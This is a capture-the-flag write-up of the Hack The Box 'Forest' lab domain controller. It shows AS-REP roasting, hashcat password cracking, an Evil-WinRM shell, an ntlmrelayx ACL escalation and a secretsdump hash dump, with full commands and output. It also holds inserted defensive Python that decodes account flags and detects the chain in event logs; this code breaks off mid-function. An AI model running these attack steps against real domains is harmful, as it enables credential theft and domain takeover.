Hack the Box – Forest Writeup [10.10.10.161]

Forest is an easy Windows-based box.

You will learn the following by exploiting the machine:

  • Enumeration of Windows Domain Services and gathering users
  • Learn how to list and get TGTs for those users that have the property ‘Do not require Kerberos preauthentication’ set (UF_DONT_REQUIRE_PREAUTH).
  • Learn how to use valid credentials against the Windows Remote Management (WinRM) service to get a shell

As usual, I added the IP of the Forest machine, 10.10.10.161, to /etc/hosts as forest.htb and started off with an nmap port scan.

➜  forest nmap -sTV -p 1-65535 -oN nmap_tcp_scan 10.10.10.161
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-05 19:43 +03
Stats: 0:00:59 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan

Nmap scan report for 10.10.10.161
Host is up (0.016s latency).
Not shown: 65511 closed ports
PORT      STATE SERVICE      VERSION
53/tcp    open  domain?
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2019-10-21 09:54:20Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC
49674/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc        Microsoft Windows RPC
49682/tcp open  msrpc        Microsoft Windows RPC
49701/tcp open  msrpc        Microsoft Windows RPC
49913/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 362.12 seconds

I found several open ports, which looked interesting. From the scan report and the open ports, the machine is most likely a domain controller for the domain “htb.local”. The domain services (Kerberos, LDAP, SMB) and the WinRM port are open and accessible from the internet, which in a real environment would be a huge vulnerability.

So, being a Windows system administrator for more than 10 years, I knew where to start: I could use a tool called enum4linux to see if I could enumerate users and other domain information.

➜  forest enum4linux -a 10.10.10.161
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Nov  5 20:01:41 2019

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.10.161
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ==================================================== 
|    Enumerating Workgroup/Domain on 10.10.10.161    |
 ==================================================== 
[E] Can't find workgroup/domain


 ============================================ 
|    Nbtstat Information for 10.10.10.161    |
 ============================================ 
Looking up status of 10.10.10.161
No reply from 10.10.10.161

 ===================================== 
|    Session Check on 10.10.10.161    |
 ===================================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[+] Server 10.10.10.161 allows sessions using username '', password ''
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451.
[+] Got domain/workgroup name: 

 =========================================== 
|    Getting domain SID for 10.10.10.161    |
 =========================================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
Domain Name: HTB
Domain Sid: S-1-5-21-3072663084-364016917-1341370565
[+] Host is part of a domain (not a workgroup)

 ====================================== 
|    OS information on 10.10.10.161    |
 ====================================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 458.
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.10.161 from smbclient: 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 467.
[+] Got OS info for 10.10.10.161 from srvinfo:
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

 ============================= 
|    Users on 10.10.10.161    |
 ============================= 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
index: 0x2137 RID: 0x463 acb: 0x00020015 Account: $331000-VK4ADACQNUCA	Name: (null)	Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00020010 Account: Administrator	Name: Administrator	Desc: Built-in account for administering the computer/domain
index: 0x2369 RID: 0x47e acb: 0x00000210 Account: andy	Name: Andy Hislip	Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount	Name: (null)	Desc: A user account managed by the system.
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest	Name: (null)	Desc: Built-in account for guest access to the computer/domain
index: 0x2352 RID: 0x478 acb: 0x00000210 Account: HealthMailbox0659cc1	Name: HealthMailbox-EXCH01-010	Desc: (null)
index: 0x234b RID: 0x471 acb: 0x00000210 Account: HealthMailbox670628e	Name: HealthMailbox-EXCH01-003	Desc: (null)
index: 0x234d RID: 0x473 acb: 0x00000210 Account: HealthMailbox6ded678	Name: HealthMailbox-EXCH01-005	Desc: (null)
index: 0x2351 RID: 0x477 acb: 0x00000210 Account: HealthMailbox7108a4e	Name: HealthMailbox-EXCH01-009	Desc: (null)
index: 0x234e RID: 0x474 acb: 0x00000210 Account: HealthMailbox83d6781	Name: HealthMailbox-EXCH01-006	Desc: (null)
index: 0x234c RID: 0x472 acb: 0x00000210 Account: HealthMailbox968e74d	Name: HealthMailbox-EXCH01-004	Desc: (null)
index: 0x2350 RID: 0x476 acb: 0x00000210 Account: HealthMailboxb01ac64	Name: HealthMailbox-EXCH01-008	Desc: (null)
index: 0x234a RID: 0x470 acb: 0x00000210 Account: HealthMailboxc0a90c9	Name: HealthMailbox-EXCH01-002	Desc: (null)
index: 0x2348 RID: 0x46e acb: 0x00000210 Account: HealthMailboxc3d7722	Name: HealthMailbox-EXCH01-Mailbox-Database-1118319013	Desc: (null)
index: 0x2349 RID: 0x46f acb: 0x00000210 Account: HealthMailboxfc9daad	Name: HealthMailbox-EXCH01-001	Desc: (null)
index: 0x234f RID: 0x475 acb: 0x00000210 Account: HealthMailboxfd87238	Name: HealthMailbox-EXCH01-007	Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00020011 Account: krbtgt	Name: (null)	Desc: Key Distribution Center Service Account
index: 0x2360 RID: 0x47a acb: 0x00000210 Account: lucinda	Name: Lucinda Berger	Desc: (null)
index: 0x2372 RID: 0x1db1 acb: 0x00000010 Account: m00haha	Name: (null)	Desc: (null)
index: 0x236a RID: 0x47f acb: 0x00000210 Account: mark	Name: Mark Brandt	Desc: (null)
index: 0x236b RID: 0x480 acb: 0x00000210 Account: santi	Name: Santi Rodriguez	Desc: (null)
index: 0x235c RID: 0x479 acb: 0x00000210 Account: sebastien	Name: Sebastien Caron	Desc: (null)
index: 0x215a RID: 0x468 acb: 0x00020011 Account: SM_1b41c9286325456bb	Name: Microsoft Exchange Migration	Desc: (null)
index: 0x2161 RID: 0x46c acb: 0x00020011 Account: SM_1ffab36a2f5f479cb	Name: SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9}	Desc: (null)
index: 0x2156 RID: 0x464 acb: 0x00020011 Account: SM_2c8eef0a09b545acb	Name: Microsoft Exchange Approval Assistant	Desc: (null)
index: 0x2159 RID: 0x467 acb: 0x00020011 Account: SM_681f53d4942840e18	Name: Discovery Search Mailbox	Desc: (null)
index: 0x2158 RID: 0x466 acb: 0x00020011 Account: SM_75a538d3025e4db9a	Name: Microsoft Exchange	Desc: (null)
index: 0x215c RID: 0x46a acb: 0x00020011 Account: SM_7c96b981967141ebb	Name: E4E Encryption Store - Active	Desc: (null)
index: 0x215b RID: 0x469 acb: 0x00020011 Account: SM_9b69f1b9d2cc45549	Name: Microsoft Exchange Federation Mailbox	Desc: (null)
index: 0x215d RID: 0x46b acb: 0x00020011 Account: SM_c75ee099d0a64c91b	Name: Microsoft Exchange	Desc: (null)
index: 0x2157 RID: 0x465 acb: 0x00020011 Account: SM_ca8c2ed5bdab4dc9b	Name: Microsoft Exchange	Desc: (null)
index: 0x2365 RID: 0x47b acb: 0x00010210 Account: svc-alfresco	Name: svc-alfresco	Desc: (null)

Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881.
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
user:[m00haha] rid:[0x1db1]

 ========================================= 
|    Share Enumeration on 10.10.10.161    |
 ========================================= 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640.
smb1cli_req_writev_submit: called for dialect[SMB3_11] server[10.10.10.161]
do_connect: Connection to 10.10.10.161 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

	Sharename       Type      Comment
	---------       ----      -------
Error returning browse list: NT_STATUS_REVISION_MISMATCH
Reconnecting with SMB1 for workgroup listing.
Failed to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 10.10.10.161

 ==================================================== 
|    Password Policy Information for 10.10.10.161    |
 ==================================================== 


[+] Attaching to 10.10.10.161 using a NULL share

[+] Trying protocol 445/SMB...

[+] Found domain(s):

	[+] HTB
	[+] Builtin

[+] Password Info for Domain: HTB

	[+] Minimum password length: 7
	[+] Password history length: 24
	[+] Maximum password age: 41 days 23 hours 53 minutes 
	[+] Password Complexity Flags: 000000

		[+] Domain Refuse Password Change: 0
		[+] Domain Password Store Cleartext: 0
		[+] Domain Password Lockout Admins: 0
		[+] Domain Password No Clear Change: 0
		[+] Domain Password No Anon Change: 0
		[+] Domain Password Complex: 0

	[+] Minimum password age: 1 day 4 minutes 
	[+] Reset Account Lockout Counter: 30 minutes 
	[+] Locked Account Duration: 30 minutes 
	[+] Account Lockout Threshold: None
	[+] Forced Log off Time: Not Set

Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 501.

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 7


 ============================== 
|    Groups on 10.10.10.161    |
 ============================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.

[+] Getting builtin groups:
group:[Account Operators] rid:[0x224]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[System Managed Accounts Group] rid:[0x245]
group:[Storage Replica Administrators] rid:[0x246]
group:[Server Operators] rid:[0x225]

======================================================================= 
|    Users on 10.10.10.161 via RID cycling (RIDS: 500-550,1000-1050)    |
 ======================================================================= 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710.
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED.  RID cycling not possible.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 742.

 ============================================= 
|    Getting printer info for 10.10.10.161    |
 ============================================= 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 991.
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED


enum4linux complete on Tue Nov  5 20:08:17 2019

So, as expected, enum4linux returned a lot of information. Among it I found a few users (sebastien, lucinda, andy, mark, santi) and a service account called svc-alfresco. I also found that the domain password policy was loosely configured: no password complexity is enforced, which hints that passwords can be cracked easily. The HealthMailbox and SM_ accounts also show that the server has a Microsoft Exchange instance installed.

From my past experience, I decided to run impacket/GetNPUsers.py (https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetNPUsers.py) to see if I could find users that have the property “Do not require Kerberos pre-authentication” set (UF_DONT_REQUIRE_PREAUTH).

I tried the user names gathered in the previous step, and none of them worked, until luckily the service account svc-alfresco returned its TGT (ticket-granting ticket) material:
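The enum4linux listing above already tells a defender which account is exposed before anyone runs GetNPUsers: the acb field is the SAMR account-control bitmask, bit 0x00010000 (ACB_DONT_REQUIRE_PREAUTH) is exactly the “Do not require Kerberos preauthentication” setting, and svc-alfresco's acb of 0x00010210 is the only one in the list with it set. The following added example is my own code, not part of the original post or of enum4linux; it decodes those flags from lines copied from the output above, using the ACB_* names from MS-SAMR.

```python
import re

# SAMR USER_ACCOUNT control bits (MS-SAMR); enum4linux prints this bitmask as "acb:".
ACB_FLAGS = {
    0x00000001: "DISABLED",
    0x00000002: "HOMDIRREQ",
    0x00000004: "PWNOTREQ",
    0x00000008: "TEMPDUP",
    0x00000010: "NORMAL",
    0x00000020: "MNS",
    0x00000040: "DOMTRUST",
    0x00000080: "WSTRUST",
    0x00000100: "SVRTRUST",
    0x00000200: "PWNOEXP",
    0x00000400: "AUTOLOCK",
    0x00000800: "ENC_TXT_PWD_ALLOWED",
    0x00001000: "SMARTCARD_REQUIRED",
    0x00002000: "TRUSTED_FOR_DELEGATION",
    0x00004000: "NOT_DELEGATED",
    0x00008000: "USE_DES_KEY_ONLY",
    0x00010000: "DONT_REQUIRE_PREAUTH",
    0x00020000: "PW_EXPIRED",
    0x00040000: "TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION",
    0x00080000: "NO_AUTH_DATA_REQUIRED",
    0x00100000: "PARTIAL_SECRETS_ACCOUNT",
    0x00200000: "USE_AES_KEYS",
}
ACB_DISABLED = 0x00000001
ACB_PWNOEXP = 0x00000200
ACB_DONT_REQUIRE_PREAUTH = 0x00010000

# One line of the enum4linux "Users on <host>" section (fields are tab-separated).
USER_LINE = re.compile(
    r"index: 0x[0-9a-f]+ RID: 0x(?P<rid>[0-9a-f]+) acb: 0x(?P<acb>[0-9a-f]+) "
    r"Account: (?P<account>\S+)\tName: (?P<name>[^\t]*)\tDesc: (?P<desc>.*)"
)


def decode_acb(acb):
    """Return the ACB_* flag names set in the bitmask, lowest bit first."""
    return [name for bit, name in sorted(ACB_FLAGS.items()) if acb & bit]


def parse_users(text):
    """Parse enum4linux user lines into dicts with account, rid, acb and name."""
    users = []
    for line in text.splitlines():
        m = USER_LINE.match(line.strip())
        if m:
            users.append({"account": m.group("account"),
                          "rid": int(m.group("rid"), 16),
                          "acb": int(m.group("acb"), 16),
                          "name": m.group("name")})
    return users


def asrep_exposed(users):
    """Enabled accounts the KDC will answer with an AS-REP without pre-authentication."""
    return [u["account"] for u in users
            if u["acb"] & ACB_DONT_REQUIRE_PREAUTH and not u["acb"] & ACB_DISABLED]


def password_never_expires(users):
    """Enabled accounts whose password is exempt from the maximum-age policy."""
    return [u["account"] for u in users
            if u["acb"] & ACB_PWNOEXP and not u["acb"] & ACB_DISABLED]


# Lines copied from the enum4linux "Users on 10.10.10.161" output above (tabs kept).
SAMPLE = (
    "index: 0xfbc RID: 0x1f4 acb: 0x00020010 Account: Administrator\tName: Administrator\tDesc: Built-in account for administering the computer/domain\n"
    "index: 0x2369 RID: 0x47e acb: 0x00000210 Account: andy\tName: Andy Hislip\tDesc: (null)\n"
    "index: 0xff4 RID: 0x1f6 acb: 0x00020011 Account: krbtgt\tName: (null)\tDesc: Key Distribution Center Service Account\n"
    "index: 0x2360 RID: 0x47a acb: 0x00000210 Account: lucinda\tName: Lucinda Berger\tDesc: (null)\n"
    "index: 0x2365 RID: 0x47b acb: 0x00010210 Account: svc-alfresco\tName: svc-alfresco\tDesc: (null)\n"
)

if __name__ == "__main__":
    users = parse_users(SAMPLE)
    for u in users:
        print(f"{u['account']:<16} acb=0x{u['acb']:08x} {' | '.join(decode_acb(u['acb']))}")
    print("AS-REP exposed:", asrep_exposed(users))  # ['svc-alfresco']
```

The same decoder run over the full listing above flags only svc-alfresco, which is why the enum4linux step alone is enough to tell an auditor which account needs pre-authentication re-enabled.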

➜  forest GetNPUsers.py -dc-ip 10.10.10.161 -no-pass HTB/sebastien
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for sebastien
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
➜  forest GetNPUsers.py -dc-ip 10.10.10.161 -no-pass HTB/lucinda
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for lucinda
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
➜  forest GetNPUsers.py -dc-ip 10.10.10.161 -no-pass HTB/svc-alfresco
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB:99042a3f11c83cf7323020f8ab1924ef$667405d6212a270a26266e95bae0a14400647dfa26313044b8fe384cfaef8290c39dda101e47b32b88f146c409543df84fd472c7d2d6d34a600069f6bb798e90840612a2245837cb029ea8e3beebd2ca9875a1f1cfe01089ccec079a93d594b4f9809bab138c8f216c8882b870f18b3fd5f433fe1f5f8108a3cd6ccedb2905820e0594d5e774e6abbe96206f01baf2984f9242f3a08a38ca9218d9327bb5d46aebe95502644e24feb71a3771ed19acdbed8621f618593e544cc5e15fb78f989ba1914c4354a7c554fae6443227202a3a74df206907e70d6a554555a47861c7bf
➜  forest 

I knew that I could crack this hash with hashcat (mode 18200, Kerberos 5 AS-REP).

➜  forest hashcat -m 18200 -a 0 -w 3 forest.hash /usr/share/wordlists/rockyou.txt --force
hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i5-6300U CPU @ 2.40GHz, 2048/5740 MB allocatable, 2MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

$krb5asrep$23$svc-alfresco@HTB:99042a3f11c83cf7323020f8ab1924ef$667405d6212a270a26266e95bae0a14400647dfa26313044b8fe384cfaef8290c39dda101e47b32b88f146c409543df84fd472c7d2d6d34a600069f6bb798e90840612a2245837cb029ea8e3beebd2ca9875a1f1cfe01089ccec079a93d594b4f9809bab138c8f216c8882b870f18b3fd5f433fe1f5f8108a3cd6ccedb2905820e0594d5e774e6abbe96206f01baf2984f9242f3a08a38ca9218d9327bb5d46aebe95502644e24feb71a3771ed19acdbed8621f618593e544cc5e15fb78f989ba1914c4354a7c554fae6443227202a3a74df206907e70d6a554555a47861c7bf:s3rvice

Using the rockyou.txt wordlist, hashcat cracked the password of the service account: svc-alfresco:s3rvice
The next step was to get a shell. Evil-WinRM, a WinRM shell tool available on GitHub, gives a shell when you have valid credentials. Since I had svc-alfresco’s credentials, I fired up Evil-WinRM after a slight modification of the command.

➜  evil-winrm git:(master) ruby evil-winrm.rb -i 10.10.10.161 -u svc-alfresco -p s3rvice -P 5985

Evil-WinRM shell v1.8

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> 

Getting User.txt

I immediately got a shell as svc-alfresco and grabbed user.txt:

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> ls


    Directory: C:\Users\svc-alfresco\Desktop


Mode                LastWriteTime         Length Name                                                                                                                                                                                                    
----                -------------         ------ ----                                                                                                                                                                                                    
-ar---        9/23/2019   2:16 PM             32 user.txt                                                                                                                                                                                                


*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> type user.txt
e5e4e4------------------13fb0d9ed
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> 

Privilege Escalation

Now that I had a user shell, my next goal was an admin shell. On the HTB forum someone said that SharpHound.ps1 can be used to identify a possible route to domain admin, but this script needs to be uploaded to the Forest machine.

BloodHound
https://github.com/BloodHoundAD/BloodHound/blob/master/Ingestors/SharpHound.ps1

Since the user svc-alfresco has rights to create a folder in C:\, I made a temporary directory called temp.
With that directory in place, I uploaded the SharpHound.ps1 file to it.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload /root/htb/forest/SharpHound.ps1 c:\temp\SharpHound.ps1
Info: Uploading /root/htb/forest/SharpHound.ps1 to c:\temp\SharpHound.ps1

Data: 1226056 bytes of 1226056 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> 
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> cd /
*Evil-WinRM* PS C:\> ls
    Directory: C:\

Mode                LastWriteTime         Length Name                                                                                                                                                                                                    
----                -------------         ------ ----                                                                                                                                                                                                    
d-----        9/20/2019   1:18 PM                PerfLogs                                                                                                                                                                                                
d-r---        9/22/2019   4:56 PM                Program Files                                                                                                                                                                                           
d-----       11/20/2016   6:36 PM                Program Files (x86)                                                                                                                                                                                     
d-----        11/5/2019  10:09 AM                temp                                                                                                                                                                                                    
d-r---        11/5/2019   2:29 AM                Users                                                                                                                                                                                                   
d-----        11/5/2019   4:22 AM                Windows                                                                                                                                                                                                 

*Evil-WinRM* PS C:\> cd temp
*Evil-WinRM* PS C:\temp> ls
    Directory: C:\temp
Mode                LastWriteTime         Length Name                                                                                                                                                                                                    
----                -------------         ------ ----                                                                                                                                                                                                    
-a----        11/5/2019  10:10 AM         919544 SharpHound.ps1                                                                                                                                                                                          

With SharpHound.ps1 uploaded, I imported it into the PowerShell session so that I could run it.

Import-module ./SharpHound.ps1

Invoke-BloodHound -CollectionMethod All

As soon as I ran this command, I had a zip file within the same directory.

I downloaded the zip file and loaded it into BloodHound by simply dragging and dropping it.

BloodHound revealed that members of the ‘Exchange Windows Permissions’ group can write the DACL of the entire HTB.local domain object.

I immediately gave the user svc-alfresco the required permission by adding it to that group:

*Evil-WinRM* PS C:\> net group "Exchange Windows Permissions" svc-alfresco /add
The command completed successfully.

*Evil-WinRM* PS C:\> 

Now that I had a possible route, I decided to use the Impacket tool ntlmrelayx.py.

➜  forest python ntlmrelayx.py -t ldap://10.10.10.161 --escalate-user svc-alfresco
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation

[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server

Now I needed to trigger an authentication for the relay: I browsed to http://localhost/privexchange and logged in as the user svc-alfresco. As soon as I authenticated, I could see that the user svc-alfresco got the permission.

[*] Servers started, waiting for connections
[*] HTTPD: Received connection from 127.0.0.1, attacking target ldap://10.10.10.161
[*] HTTPD: Client requested path: /privexchange
[*] HTTPD: Received connection from 127.0.0.1, attacking target ldap://10.10.10.161
[*] HTTPD: Client requested path: /privexchange
[*] HTTPD: Client requested path: /privexchange
[*] Authenticating against ldap://10.10.10.161 as \svc-alfresco SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD: Received connection from 127.0.0.1, attacking target ldap://10.10.10.161
[*] HTTPD: Client requested path: /favicon.ico
[*] HTTPD: Client requested path: /favicon.ico
[*] HTTPD: Client requested path: /favicon.ico
[*] User privileges found: Create user
[*] Dumping domain info for first time
[*] Authenticating against ldap://10.10.10.161 as \svc-alfresco SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] Domain info dumped into lootdir!
[*] User privileges found: Create user

I went on to get the Administrator hash using the Impacket secretsdump tool.

➜  examples git:(master) ✗ secretsdump htb/svc-alfresco:s3rvice@10.10.10.161
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
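The chain above leaves a trail on the domain controller that a defender can alert on: the net group add is a 4728/4732/4756 group-membership event, the ACL write done through the relay is a 5136 on the domain object's nTSecurityDescriptor (when Directory Service Changes auditing is on), and secretsdump's DRSUAPI pull is a 4662 carrying the replication extended-right GUIDs from an account that is not a DC machine account. The following added detection example is my own code, not from the post or from Impacket; the event records and timestamps are constructed and simplified, with field names taken from the Security log XML.

```python
from datetime import datetime, timedelta

# Security-log IDs for "member added to a security-enabled group", by group scope.
GROUP_ADD_EVENTS = {4728: "global", 4732: "domain-local", 4756: "universal"}

# Groups whose membership changes deserve an alert; "Exchange Windows Permissions"
# is the group BloodHound flagged above (its members can write the domain DACL).
SENSITIVE_GROUPS = {"Exchange Windows Permissions", "Account Operators",
                    "Administrators", "Domain Admins", "Enterprise Admins"}

# Extended-rights GUIDs that appear in the Properties of a 4662 when a caller
# pulls directory replication data (what secretsdump's DRSUAPI method does).
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}
DOMAIN_HEAD = "DC=htb,DC=local"  # the object whose DACL the chain rewrites


def cn_of(dn):
    """'CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local' -> 'svc-alfresco'."""
    first = dn.split(",", 1)[0]
    return first[3:] if first.upper().startswith("CN=") else first


def classify(ev):
    """Return (alert_name, account) for a suspicious event, else None."""
    eid = ev["EventID"]
    if eid in GROUP_ADD_EVENTS and ev.get("TargetUserName") in SENSITIVE_GROUPS:
        return ("sensitive_group_add", cn_of(ev["MemberName"]))
    # 5136 needs the "Directory Service Changes" audit subcategory and a SACL
    # on the domain object; it records which attribute was written.
    if (eid == 5136 and ev.get("ObjectDN") == DOMAIN_HEAD
            and ev.get("AttributeLDAPDisplayName") == "nTSecurityDescriptor"):
        return ("domain_dacl_modified", ev["SubjectUserName"])
    if eid == 4662 and REPLICATION_GUIDS & set(ev.get("Properties", ())):
        # Domain controllers replicate with their machine accounts (name ends
        # in '$'); a plain user account pulling replication data is DCSync.
        if not ev["SubjectUserName"].endswith("$"):
            return ("replication_by_user_account", ev["SubjectUserName"])
    return None


def detect(events, window=timedelta(hours=1)):
    """Per-event alerts, plus a 'dcsync_chain' alert when the same account is
    added to a sensitive group and then pulls replication data within window."""
    alerts, first_seen = [], {}
    for ev in sorted(events, key=lambda e: e["Time"]):
        hit = classify(ev)
        if hit is None:
            continue
        alerts.append((ev["Time"], ev["EventID"]) + hit)
        name, account = hit
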